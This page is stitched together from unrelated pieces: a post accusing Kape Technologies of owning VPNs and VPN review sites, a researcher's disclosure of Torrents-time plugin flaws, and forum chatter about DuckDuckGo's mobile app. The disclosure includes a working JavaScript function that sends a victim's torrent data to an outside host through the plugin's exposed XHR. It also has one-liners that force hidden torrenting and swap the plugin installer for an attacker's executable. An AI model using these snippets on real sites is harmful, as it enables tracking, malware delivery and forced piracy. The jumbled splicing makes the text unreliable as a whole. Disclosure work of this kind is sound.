here’s the story. i know expressvpn has been recommended in some ☠️ how-to posts but it is not trustworthy. the parent company, kape technologies, not only used to distribute malate but has ties to multiple state surveillance agencies. and be careful where you look for info about good vpns, because kape technologies owns a bunch of “vpn review” sites too
In case anyone can’t read the article for whatever reasons, the VPNs acquired are:
ExpressVPN
Private Internet Access
Zenmate
CyberGhost
And the VPN review sites they purchased are:
vpnMentor
Wizcase
So if you use any of those, time to look for other options.
A “new” method of streaming torrents in your web browser, based around existing technologies Torrents-time was quickly adopted by a majority of torrent sites due to its ability to embed a player on the page to stream video content from torrents.
Profiting from VPN “partnership”, trusting a random VPN service is a writeup for another day.
Attack Vectors
This service stupidly abuses CORS, even worse it exposes a CORS enabled XHR object after requesting an instance of the plugin. So lets take advantage of that.
We don’t need anything more to do this attack than
Where torrents.js is their CDN code, once we have the first two scripts loaded attack.js can make use of all of torrentsTime useful functions on any page.
So in a few seconds we can get torrentTime on any HTML5 page, that’s great!
Except now I’m free to do a few things.
Concern 1 - Forced Piracy
Because I can make an invisible player, I’m free to force you to torrent whatever I like, even if you had no intention of streaming said content with a line of code
torrentsTime.instances.i0.start();
Great, you were just forced to torrent illegal content insecurely. You can do this for an unlimited amount of content. I can use any publisher ID as well.
Concern 2 - User Tracking/Privacy
Lets say I’m an advertiser/group with access to javascript on a website, with a few lines of code, not only can I tell who you are, I can send all that data using torrentsTime very exposed xhr object.
function driveBy() { //Torrents-time detected! //i0 is the first instance, loop over instances to get all currently started torrents var torrentTitle = torrentsTime.instances.i0.setup.title; var browser = torrentsTime.instances.i0.setup.browser; var filetype = torrentsTime.instances.i0.setup.fileType; //any other code we want to do on the page //this supports callback/JSONP //use the exposed xhr torrentsTime.utils.xhr("https://andrew.im/sandbox/tracktt.php?title=" + torrentTitle + "&browser=" + browser + "&filetype=" +filetype, callback); } function callback(data) { console.log(data); }
Instant results
Concern 3 - Even more privacy issues
Every time you make a request to the CDN the following data is logged by Torrents-time servers
IP, location (country), user agent, cookies, and and likely the exact page you requested the CDN from. Further more within the C code you can see the use of private keys masking SOMETHING which does indeed make http request, I’ve yet to break this.
Concern 4 - It runs as root on OSX
It runs as root on OSX. I really don’t need to say more.
Concern 5 - Redirect Plugin DownloadX
Redirecting the download for the plugin is again only a single line of code torrentsTime.setup.installerURL.windows = "https://andrew.im/sandbox/torrentsTime-download.exe"; After that you just fire torrentsTime.downloadInstaller(); Or when a user clicks the plugin download, they will be greeted with a legit looking prompt
Of course the application isn’t the installer for the plugin, its your own application.
Concern 6 - XSS
Seems just about every site with TT installed is vunerable to XSS now.
Piratebay
Concern 7 - Sky rocket cpu usage/crash it
Literally just ping the server with 1024 bytes and the cpu usage stays between 50% and 80%, no idea why this one even occurs. Program later crashes when sending random strings, so possible bufferoverflow waiting to be exploited.
Concern 8 - Bundled Certs
includes the private keys to their for ‘encrypted’ comms channel. Details here UPDATE their cert for localhost has been revoked.
Resources
You can download Torrents-time c-code here, as well as all the NODEJS used on your computer
Seriously, remove this software from your computer, if you put it on your site, remove it, if you think about adding it, don’t. More exploits coming soon!
It would’ve been one thing if they were upfront about this, but hiding it means they can’t be trusted. Time to look for a new search engine. Any one know any other tracker-resistant search engines?
I looked into this because I use DuckDuckGo and I think it’s really important to keep organizations accountable especially when they claim to be different TM than shitty ones. So it looks like this is true (as of now) for the mobile browser application specifically, not the search engine in general.
which means that using the search engine on another browser like Firefox should be fine, and also now is a great time to let the company know exactly why you are uninstalling their *application* on your device to hopefully either force a backpedal or heavily discourage further shit like this down the line.
it’s a slimy move to be sure. I just think it’s important to be specific and precise. Here’s another article on the subject:
